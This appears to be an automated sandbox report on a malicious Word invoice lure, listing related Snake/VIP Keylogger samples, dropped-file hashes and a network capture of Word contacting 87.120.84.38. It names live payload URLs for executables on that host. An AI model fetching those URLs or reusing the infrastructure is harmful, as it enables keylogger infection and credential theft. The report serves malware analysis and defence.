    87.120.84.38PO Ref673947.docx.docGet hashmaliciousUnknownBrowse
    • 87.120.84.38/txt/mnobizx.doc
    mnobizx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
    • 87.120.84.38/txt/mnobizx.com
    yugozxcvb.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
    • 87.120.84.38/txt/yugozxcv.exe
    Quotation Botisk 1475-HIRSCH Technik,____________________________________________.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
    • 87.120.84.38/txt/dtgLBRsUB45qnMm.exe
    quotation list 1.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
    • 87.120.84.38/txt/EGwnUqNrVeLFNPw.exe
    Scanned Copy.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
    • 87.120.84.38/txt/RKbqmU7pcsLQXbJ.exe
    na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
    • 87.120.84.38/txt/9qP0xWlHdvhkbFG.exe
    na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
    • 87.120.84.38/txt/Rnuwcr38IRNoHzK.exe
    na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
    • 87.120.84.38/txt/iA8CGls28DqWbrP.exe
    Scan-Purchase Order3550..docx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
    • 87.120.84.38/txt/iA8CGls28DqWbrP.exe
    No context
    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    SHARCOM-ASBGPO Ref673947.docx.docGet hashmaliciousUnknownBrowse
    • 87.120.84.38
    mnobizx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
    • 87.120.84.38
    yugozxcvb.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
    • 87.120.84.38
    Quotation Botisk 1475-HIRSCH Technik,____________________________________________.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
    • 87.120.84.38
    quotation list 1.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
    • 87.120.84.38
    Scanned Copy.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
    • 87.120.84.38
    na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
    • 87.120.84.38
    na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
    • 87.120.84.38
    na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
    • 87.120.84.38
    Scan-Purchase Order3550..docx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
    • 87.120.84.38
    No context
    No context
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):131072
    Entropy (8bit):0.025419031394342973
    Encrypted:false
    SSDEEP:6:I3DPcvHvxggLRNU+OSLRXv//4tfnRujlw//+GtluJ/eRuj:I3DPA6+BvYg3J/
    MD5:AE40C421BB48CCAAE56494A60E3FB099
    SHA1:5B1D8785CBE5D9B5CD7718CD1C32B98ECD27453E
    SHA-256:AC56F1441FEAEADFD5C45E6682A4C3635FF620896D1C5284E097EF22DD940400
    SHA-512:F0F2C1FE46EE5F742DD0348D9520BCA3527D22CEFC74F8BE3C3112D9C1B0E98740E14CFDAC3672DB7B204A587E1AD974495781E8395FA4E328A7D86C7C4F8E3B
    Malicious:false
    Reputation:low
    Preview:......M.eFy...zi.r..K..!.....S,...X.F...Fa.q.............................Qf.:..H.....5.................O.....!z......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):16384
    Entropy (8bit):0.0
    Encrypted:false
    SSDEEP:3::
    MD5:CE338FE6899778AACFC28414F2D9498B
    SHA1:897256B6709E1A4DA9DABA92B6BDE39CCFCCD8C1
    SHA-256:4FE7B59AF6DE3B665B67788CC2F99892AB827EFAE3A467342B3BB4E3BC8E5BFE
    SHA-512:6EB7F16CF7AFCABE9BDEA88BDAB0469A7937EB715ADA9DFD8F428D9D38D86133945F5F2F2688DDD96062223A39B5D47F07AFC3C48D9DB1D5EE3F41C8D274DCCF
    Malicious:false
    Reputation:high, very likely benign file
    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):1536
    Entropy (8bit):1.3556721012796193
    Encrypted:false
    SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbi:IiiiiiiiiifdLloZQc8++lsJe1Mzdn
    MD5:920B248E02E2D59544A87D890240E4E4
    SHA1:EBA80C7DD59454FC2760B78DE67DAC0F5D3C7DAC
    SHA-256:1F041AC1E99F9E39A3FDED99535CC539A2FC03341672EDD788BA99E9ACA7A85B
    SHA-512:B85CC8CC7022941A10F03BDB6CA73061DAC66EB5F29A20202DB9D85CA203ECABE72D4F0F6F8F5FE046DB68AAF7D5235DA98BFC2EA864EF71A8D4E986B062F450
    Malicious:false
    Reputation:low
    Preview:..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):1024
    Entropy (8bit):0.05390218305374581
    Encrypted:false
    SSDEEP:3:ol3lYdn:4Wn
    MD5:5D4D94EE7E06BBB0AF9584119797B23A
    SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
    SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
    SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
    Malicious:false
    Reputation:high, very likely benign file
    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):1879552
    Entropy (8bit):3.6504681095961264
    Encrypted:false
    SSDEEP:6144:6emBde8emQrde9emBdehemKembemBdeUemBdeQemBdehemHemBde2emBdeuemBd+:00s9
    MD5:4EED3A8E4CF59A1998DDD1077FC1207D
    SHA1:B06F180518710946443E3EBDBF3B63B1BF78EC25
    SHA-256:E13E4A9273A8659C12EBAB334E1FC45563C2FD2F0CE6CD3210B684AFA88B5188
    SHA-512:414174170F62AB12E56FBCE6E213B7FB3FFC150F71119D8D49924FE6C02B4B2A3BD0419A4585148A704F4C910F63C524F91FF543396B1C160217B5397F166A04
    Malicious:false
    Reputation:low
    Preview:..d.M.B.C.....B.E.S.O.N.D.E.R.H.E.D.E. .B.E.S.O.N.D.E.R.H.E.D.E. .V.I.R. .H.I.E.R.D.I.E. .M.A.A.N.D.....D.R.A.E.N.D.E. .N.R... .H.O.E.V.....3.0.2.0.8. .N.B.C. .D.R.A.A.G. .3.0. .S.T.K.....3.0.3.0.8. .N.B.C. .D.R.A.A.G. .6. .S.T.K.....3.2.0.0.7.X. .N.B.C. .D.R.A.A.G. .7.4. .S.T.K.....3.3.0.0.5. .N.B.C. .w.a.t. .5. .s.t.e.l.l.e. .d.r.a.....5.2.7.9.9. ./. .8.0.0.U. .(.2.5.8.7.7./.2.1.). .N.B.C. .w.a.t. .3.0. .P.C.S. .d.r.a.....6.0.0.1. .N.B.C. .w.a.t. .1.0.0. .s.t.u.k.s. .d.r.a.....6.0.0.4. .N.B.C. .w.a.t. ...................f...h...................................R...T..................................................................................................................................................................................................................................................................................................<...$..$.If........!v..h.#v..9.:V....l...,..t.......9..6.,.....5.....9.9...../.............B.....a..].p............yt.K......d........gd.
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):131072
    Entropy (8bit):0.02530809714456188
    Encrypted:false
    SSDEEP:6:I3DPcBRUqOxbvxggLRB6Hkk/g3RXv//4tfnRujlw//+GtluJ/eRuj:I3DPQGVZNfkoRvYg3J/
    MD5:6E38B858CAA8CADD63986AEC7D943F49
    SHA1:CB52AC7B1D51E4FACFB9FBF2B5DA6D0BB2C0BE9D
    SHA-256:D48ECCCB5E112AE686A09441C0969CDD0BDE76DCA2FFDB57BDA10867D23CEA82
    SHA-512:FADCF1306C55F8AAD3E0549171514379D10975DCDAE0215A16AF150B4B6D60FE05C066D6CE0D3D12F40199C06507AC433230E466B18ADAE4595FBB91A8882FEB
    Malicious:false
    Reputation:low
    Preview:......M.eFy...zF.1}...O.^....g.S,...X.F...Fa.q..............................._.:.F.F.v..A...........S..c.K....[D.......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):131072
    Entropy (8bit):0.025419031394342973
    Encrypted:false
    SSDEEP:6:I3DPcvHvxggLRNU+OSLRXv//4tfnRujlw//+GtluJ/eRuj:I3DPA6+BvYg3J/
    MD5:AE40C421BB48CCAAE56494A60E3FB099
    SHA1:5B1D8785CBE5D9B5CD7718CD1C32B98ECD27453E
    SHA-256:AC56F1441FEAEADFD5C45E6682A4C3635FF620896D1C5284E097EF22DD940400
    SHA-512:F0F2C1FE46EE5F742DD0348D9520BCA3527D22CEFC74F8BE3C3112D9C1B0E98740E14CFDAC3672DB7B204A587E1AD974495781E8395FA4E328A7D86C7C4F8E3B
    Malicious:false
    Preview:......M.eFy...zi.r..K..!.....S,...X.F...Fa.q.............................Qf.:..H.....5.................O.....!z......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:10 2023, mtime=Fri Aug 11 15:42:10 2023, atime=Mon Oct 21 10:27:28 2024, length=327345, window=hide
    Category:dropped
    Size (bytes):1059
    Entropy (8bit):4.551094860384169
    Encrypted:false
    SSDEEP:12:8B29CjgXg/XAlCPCHaXNBedzB/qPX+WU2qmOXdQjuicvbsaNrD4vJGDtZ3YilMMy:8B26/XT98dz4/qmBNehNHrDv3qNA57u
    MD5:8E321370293FDEF96CD7EA9FA96A9B11
    SHA1:7EC7FF817FE4FC0E0400424AC49DE70DCE9C85A9
    SHA-256:667A1FBBF6DA4F2B91118717FF706D4E7C1733805002367C0A1498CA8F322C8F
    SHA-512:22138B1B2BD877D7FBA6713C307B8A3DE1C2A90FBE2CD3F711887D7393F6C609989F5C0A24D64636414CFF5C19E90A9BD0D611229A7644EBB68277CB8E4D1C6F
    Malicious:false
    Preview:L..................F.... .....S.r.....S.r....]86.#...............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....UYl[..user.8......QK.XUYl[*...&=....U...............A.l.b.u.s.....z.1......WG...Desktop.d......QK.X.WG.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....x.2.....UYo[ .INVOIC~1.DOC..\.......WF..WF.*.........................I.N.V.O.I.C.E.X.-.X.C.o.p.y...d.o.c.x...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\813848\Users.user\Desktop\INVOICEX-XCopy.docx.doc.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.I.N.V.O.I.C.E.X.-.X.C.o.p.y...d.o.c.x...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......813848..........D_....3N.
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:Generic INItialization configuration [folders]
    Category:dropped
    Size (bytes):72
    Entropy (8bit):4.638471355518834
    Encrypted:false
    SSDEEP:3:M1KzqsX9A3cLBddpSm4SGsX9A3cLBddpSv:MczqAG3c1BrGAG3c1Bc
    MD5:3867B0CE9A3E704C8176195A833F4C8E
    SHA1:5B7AB2AA340599A93FA4D2572DF61105885ECA54
    SHA-256:989C3F93CCB57E0EB8549CA4ED2148E7FE5EB76C42A33DE3887F86372F31B257
    SHA-512:859A84566B4DECF49CE23AA79FEED206B719F1EB74F214C3B1608F1D685B38CE6CB79B44B06DFD999E79375C36D3FB9897C706DFBEB36643999496A9B7674379
    Malicious:false
    Preview:[doc]..INVOICEX-XCopy.docx.LNK=0..[folders]..INVOICEX-XCopy.docx.LNK=0..
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):162
    Entropy (8bit):2.4797606462020307
    Encrypted:false
    SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
    MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
    SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
    SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
    SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
    Malicious:false
    Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:Unicode text, UTF-16, little-endian text, with no line terminators
    Category:dropped
    Size (bytes):2
    Entropy (8bit):1.0
    Encrypted:false
    SSDEEP:3:Qn:Qn
    MD5:F3B25701FE362EC84616A93A45CE9998
    SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
    SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
    SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
    Malicious:false
    Preview:..
    File type:Microsoft Word 2007+
    Entropy (8bit):7.9933770268245175
    TrID:
    • Word Microsoft Office Open XML Format document (49504/1) 58.23%
    • Word Microsoft Office Open XML Format document (27504/1) 32.35%
    • ZIP compressed archive (8000/1) 9.41%
    File name:INVOICEX-XCopy.docx.doc
    File size:327'345 bytes
    MD5:ec621a479efeb5576dbe1ede8245894b
    SHA1:9a3c1d701f29f7f65c9d1fab217cd55a1cc3609e
    SHA256:06894236b22810452dd0bfaf02c3a0cde3428fe19eb9e789b344de6ba4079083
    SHA512:2523d728326cd120a7249c427cdb55f16a053c55b36a0ada964625dd1ef61f104cdb64763ff458dd2393c42a516dd2371eb51bb1390355cdd29e04672d114169
    SSDEEP:6144:t07JHBA0B56szCXqqqqqmzYhuO+FLh5C2z9mLx:2d/qYYFNHrz9c
    TLSH:E06412060C9780C883097859F1A9151E2B6F9C339D63CC359BF8DABB4A659CCD7B7B48
    File Content Preview:PK..........RY...7U... .......[Content_Types].xmlUT...6..g6..g6..g...n.0.E...............e.T.....U..<...;!.U.%U.M.d..sgby0ZW.[BB.|!.yOd.u0....>y....Iy.\.P.........M..X...s.x/%.9T....s...R..i&...j......:x.O].=.p...Z8.....I........U....Z...........r..s....B
    Icon Hash:2764a3aaaeb7bdbf
    Document Type:OpenXML
    Number of OLE Files:1
    Has Summary Info:
    Application Name:
    Encrypted Document:False
    Contains Word Document Stream:True
    Contains Workbook/Book Stream:False
    Contains PowerPoint Document Stream:False
    Contains Visio Document Stream:False
    Contains ObjectPool Stream:False
    Flash Objects Count:0
    Contains VBA Macros:False
    Timestamp                             Source Port  Dest Port  Source IP     Dest IP
    Oct 21, 2024 13:27:31.558346987 CEST  49163  80     192.168.2.22  87.120.84.38
    Oct 21, 2024 13:27:31.564153910 CEST  80     49163  87.120.84.38  192.168.2.22
    Oct 21, 2024 13:27:31.564248085 CEST  49163  80     192.168.2.22  87.120.84.38
    Oct 21, 2024 13:27:31.564333916 CEST  49163  80     192.168.2.22  87.120.84.38
    Oct 21, 2024 13:27:31.569649935 CEST  80     49163  87.120.84.38  192.168.2.22
    Oct 21, 2024 13:27:32.499454975 CEST  80     49163  87.120.84.38  192.168.2.22
    Oct 21, 2024 13:27:32.499553919 CEST  49163  80     192.168.2.22  87.120.84.38
    Oct 21, 2024 13:27:32.957257032 CEST  49164  80     192.168.2.22  87.120.84.38
    Oct 21, 2024 13:27:32.964231014 CEST  80     49164  87.120.84.38  192.168.2.22
    Oct 21, 2024 13:27:32.964510918 CEST  49164  80     192.168.2.22  87.120.84.38
    Oct 21, 2024 13:27:32.964512110 CEST  49164  80     192.168.2.22  87.120.84.38
    Oct 21, 2024 13:27:32.971540928 CEST  80     49164  87.120.84.38  192.168.2.22
    Oct 21, 2024 13:27:33.898271084 CEST  80     49164  87.120.84.38  192.168.2.22
    Oct 21, 2024 13:27:34.108083963 CEST  80     49164  87.120.84.38  192.168.2.22
    Oct 21, 2024 13:27:34.108165979 CEST  49164  80     192.168.2.22  87.120.84.38
    Oct 21, 2024 13:27:37.073508024 CEST  49165  80     192.168.2.22  87.120.84.38
    Oct 21, 2024 13:27:37.081321001 CEST  80     49165  87.120.84.38  192.168.2.22
    Oct 21, 2024 13:27:37.081418037 CEST  49165  80     192.168.2.22  87.120.84.38
    Oct 21, 2024 13:27:37.081549883 CEST  49165  80     192.168.2.22  87.120.84.38
    Oct 21, 2024 13:27:37.088407040 CEST  80     49165  87.120.84.38  192.168.2.22
    Oct 21, 2024 13:27:38.038214922 CEST  80     49165  87.120.84.38  192.168.2.22
    Oct 21, 2024 13:27:38.040889978 CEST  49165  80     192.168.2.22  87.120.84.38
    Oct 21, 2024 13:27:38.046467066 CEST  80     49165  87.120.84.38  192.168.2.22
    Oct 21, 2024 13:27:38.339068890 CEST  80     49165  87.120.84.38  192.168.2.22
    Oct 21, 2024 13:27:38.545488119 CEST  49165  80     192.168.2.22  87.120.84.38
    Oct 21, 2024 13:27:38.547390938 CEST  80     49165  87.120.84.38  192.168.2.22
    Oct 21, 2024 13:27:38.547466040 CEST  49165  80     192.168.2.22  87.120.84.38
    Oct 21, 2024 13:27:38.681082010 CEST  49165  80     192.168.2.22  87.120.84.38
    Oct 21, 2024 13:27:38.686901093 CEST  80     49165  87.120.84.38  192.168.2.22
    Oct 21, 2024 13:27:38.979559898 CEST  80     49165  87.120.84.38  192.168.2.22
    Oct 21, 2024 13:27:38.979826927 CEST  49165  80     192.168.2.22  87.120.84.38
    Oct 21, 2024 13:27:38.985536098 CEST  80     49165  87.120.84.38  192.168.2.22
    Oct 21, 2024 13:27:39.277832031 CEST  80     49165  87.120.84.38  192.168.2.22
    Oct 21, 2024 13:27:39.477997065 CEST  49165  80     192.168.2.22  87.120.84.38
    Oct 21, 2024 13:27:39.619071007 CEST  80     49165  87.120.84.38  192.168.2.22
    Oct 21, 2024 13:27:39.619144917 CEST  49165  80     192.168.2.22  87.120.84.38
    Oct 21, 2024 13:27:39.619998932 CEST  80     49165  87.120.84.38  192.168.2.22
    Oct 21, 2024 13:27:39.913047075 CEST  80     49165  87.120.84.38  192.168.2.22
    Oct 21, 2024 13:27:39.914808989 CEST  49165  80     192.168.2.22  87.120.84.38
    Oct 21, 2024 13:27:39.920401096 CEST  80     49165  87.120.84.38  192.168.2.22
    Oct 21, 2024 13:27:40.211926937 CEST  80     49165  87.120.84.38  192.168.2.22
    Oct 21, 2024 13:27:40.243146896 CEST  49163  80     192.168.2.22  87.120.84.38
    Oct 21, 2024 13:27:40.248938084 CEST  80     49163  87.120.84.38  192.168.2.22
    Oct 21, 2024 13:27:40.417382002 CEST  49165  80     192.168.2.22  87.120.84.38
    Oct 21, 2024 13:27:40.540352106 CEST  80     49163  87.120.84.38  192.168.2.22
    Oct 21, 2024 13:27:40.540426970 CEST  49163  80     192.168.2.22  87.120.84.38
    Oct 21, 2024 13:28:39.073144913 CEST  80     49164  87.120.84.38  192.168.2.22
    Oct 21, 2024 13:28:39.073393106 CEST  49164  80     192.168.2.22  87.120.84.38
    Oct 21, 2024 13:28:39.073393106 CEST  49164  80     192.168.2.22  87.120.84.38
    Oct 21, 2024 13:28:39.079199076 CEST  80     49164  87.120.84.38  192.168.2.22
    Oct 21, 2024 13:28:45.388437033 CEST  80     49165  87.120.84.38  192.168.2.22
    Oct 21, 2024 13:28:45.388581038 CEST  49165  80     192.168.2.22  87.120.84.38
    Oct 21, 2024 13:28:45.402510881 CEST  49165  80     192.168.2.22  87.120.84.38
    Oct 21, 2024 13:28:45.407891989 CEST  80     49165  87.120.84.38  192.168.2.22
    Oct 21, 2024 13:28:45.709167004 CEST  80     49163  87.120.84.38  192.168.2.22
    Oct 21, 2024 13:28:45.709330082 CEST  49163  80     192.168.2.22  87.120.84.38
    Oct 21, 2024 13:29:30.132639885 CEST  49163  80     192.168.2.22  87.120.84.38
    Oct 21, 2024 13:29:30.138286114 CEST  80     49163  87.120.84.38  192.168.2.22
    • 87.120.84.38
    Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
    0           192.168.2.22  49163        87.120.84.38    80                3312  C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    Timestamp                             Bytes transferred  Direction  Data
    Oct 21, 2024 13:27:31.564333916 CEST  138  OUT  OPTIONS /txt/ HTTP/1.1
    User-Agent: Microsoft Office Protocol Discovery
    Host: 87.120.84.38
    Content-Length: 0
    Connection: Keep-Alive
    Oct 21, 2024 13:27:32.499454975 CEST  187  IN  HTTP/1.1 200 OK
    Server: nginx/1.26.2
    Date: Mon, 21 Oct 2024 11:27:32 GMT
    Content-Type: httpd/unix-directory
    Content-Length: 0
    Connection: keep-alive
    Allow: POST,OPTIONS,HEAD,GET
    Oct 21, 2024 13:27:40.243146896 CEST  362  OUT  GET /txt/mncharliezx.doc HTTP/1.1
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    Host: 87.120.84.38
    Connection: Keep-Alive
    Oct 21, 2024 13:27:40.540352106 CEST  447  IN  HTTP/1.1 404 Not Found
    Server: nginx/1.26.2
    Date: Mon, 21 Oct 2024 11:27:40 GMT
    Content-Type: text/html; charset=iso-8859-1
    Transfer-Encoding: chunked
    Connection: keep-alive
    Content-Encoding: gzip
    Data Raw: 65 36 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 4f c1 4a c4 30 14 bc f7 2b 9e 7b d2 83 79 6d 0d d8 43 08 ac db 2e 2e d4 b5 68 7a f0 98 dd 3c c9 c2 da d4 24 55 fc 7b d3 2e 82 97 07 33 6f 66 98 11 57 f5 f3 46 bd 75 0d 3c aa a7 16 ba fe a1 dd 6d 60 75 8b b8 6b d4 16 b1 56 f5 e5 53 b2 1c b1 d9 af 64 26 6c fc 38 4b 61 49 9b 04 e2 29 9e 49 f2 9c c3 de 45 d8 ba 69 30 02 2f 64 26 70 11 89 83 33 3f b3 af 90 ff 34 09 65 62 94 ca 12 78 fa 9c 28 44 32 d0 bf b4 f0 ad 03 0c 29 eb 7d ce 02 37 40 b4 a7 00 81 fc 17 79 26 70 9c 93 7c 3a da 18 4f 21 c8 f5 a8 8f 96 b0 64 9c f1 02 ae fb c3 34 c4 e9 06 5e 17 03 e8 08 d5 3d 2b ca 9c 55 9c dd 55 d0 39 9f 98 5c e0 9f 3d b5 5c fa a5 b2 f3 ae ec 17 81 af 29 7c 12 01 00 00 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e6MOJ0+{ymC..hz<$U{.3ofWFu<m`ukVSd&l8KaI)IEi0/d&p3?4ebx(D2)}7@y&p|:O!d4^=+UU9\=\)|0


    Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
    1           192.168.2.22  49164        87.120.84.38    80                3312  C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    Timestamp                             Bytes transferred  Direction  Data
    Oct 21, 2024 13:27:32.964512110 CEST  132  OUT  HEAD /txt/mncharliezx.doc HTTP/1.1
    Connection: Keep-Alive
    User-Agent: Microsoft Office Existence Discovery
    Host: 87.120.84.38
    Oct 21, 2024 13:27:33.898271084 CEST  154  IN  HTTP/1.1 404 Not Found
    Server: nginx/1.26.2
    Date: Mon, 21 Oct 2024 11:27:33 GMT
    Content-Type: text/html; charset=iso-8859-1
    Connection: keep-alive
    Oct 21, 2024 13:27:34.108083963 CEST  154  IN  HTTP/1.1 404 Not Found
    Server: nginx/1.26.2
    Date: Mon, 21 Oct 2024 11:27:33 GMT
    Content-Type: text/html; charset=iso-8859-1
    Connection: keep-alive


    Session ID  Source IP     Source Port  Destination IP  Destination Port
    2           192.168.2.22  49165        87.120.84.38    80
    Timestamp                             Bytes transferred  Direction  Data
    Oct 21, 2024 13:27:37.081549883 CEST  132  OUT  OPTIONS /txt HTTP/1.1
    Connection: Keep-Alive
    User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
    translate: f
    Host: 87.120.84.38
    Oct 21, 2024 13:27:38.038214922 CEST  529  IN  HTTP/1.1 301 Moved Permanently
    Server: nginx/1.26.2
    Date: Mon, 21 Oct 2024 11:27:37 GMT
    Content-Type: text/html; charset=iso-8859-1
    Content-Length: 310
    Connection: keep-alive
    Location: http://87.120.84.38/txt/
    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://87.120.84.38/txt/">here</a>.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 87.120.84.38 Port 80</address></body></html>
    Oct 21, 2024 13:27:38.040889978 CEST  133  OUT  OPTIONS /txt/ HTTP/1.1
    Connection: Keep-Alive
    User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
    translate: f
    Host: 87.120.84.38
    Oct 21, 2024 13:27:38.339068890 CEST  187  IN  HTTP/1.1 200 OK
    Server: nginx/1.26.2
    Date: Mon, 21 Oct 2024 11:27:38 GMT
    Content-Type: httpd/unix-directory
    Content-Length: 0
    Connection: keep-alive
    Allow: POST,OPTIONS,HEAD,GET
    Oct 21, 2024 13:27:38.547390938 CEST  187  IN  HTTP/1.1 200 OK
    Server: nginx/1.26.2
    Date: Mon, 21 Oct 2024 11:27:38 GMT
    Content-Type: httpd/unix-directory
    Content-Length: 0
    Connection: keep-alive
    Allow: POST,OPTIONS,HEAD,GET
    Oct 21, 2024 13:27:38.681082010 CEST  162  OUT  PROPFIND /txt HTTP/1.1
    Connection: Keep-Alive
    User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
    Depth: 0
    translate: f
    Content-Length: 0
    Host: 87.120.84.38
    Oct 21, 2024 13:27:38.979559898 CEST  529  IN  HTTP/1.1 301 Moved Permanently
    Server: nginx/1.26.2
    Date: Mon, 21 Oct 2024 11:27:38 GMT
    Content-Type: text/html; charset=iso-8859-1
    Content-Length: 310
    Connection: keep-alive
    Location: http://87.120.84.38/txt/
    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://87.120.84.38/txt/">here</a>.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 87.120.84.38 Port 80</address></body></html>
    Oct 21, 2024 13:27:38.979826927 CEST  163  OUT  PROPFIND /txt/ HTTP/1.1
    Connection: Keep-Alive
    User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
    Depth: 0
    translate: f
    Content-Length: 0
    Host: 87.120.84.38
    Oct 21, 2024 13:27:39.277832031 CEST  517  IN  HTTP/1.1 405 Method Not Allowed
    Server: nginx/1.26.2
    Date: Mon, 21 Oct 2024 11:27:39 GMT
    Content-Type: text/html; charset=iso-8859-1
    Content-Length: 303
    Connection: keep-alive
    Allow: POST,OPTIONS,HEAD,GET
    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method PROPFIND is not allowed for this URL.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 87.120.84.38 Port 80</address></body></html>
    Oct 21, 2024 13:27:39.477997065 CEST  162  OUT  PROPFIND /txt HTTP/1.1
    Connection: Keep-Alive
    User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
    Depth: 0
    translate: f
    Content-Length: 0
    Host: 87.120.84.38
    Oct 21, 2024 13:27:39.619071007 CEST  517  IN  HTTP/1.1 405 Method Not Allowed
    Server: nginx/1.26.2
    Date: Mon, 21 Oct 2024 11:27:39 GMT
    Content-Type: text/html; charset=iso-8859-1
    Content-Length: 303
    Connection: keep-alive
    Allow: POST,OPTIONS,HEAD,GET
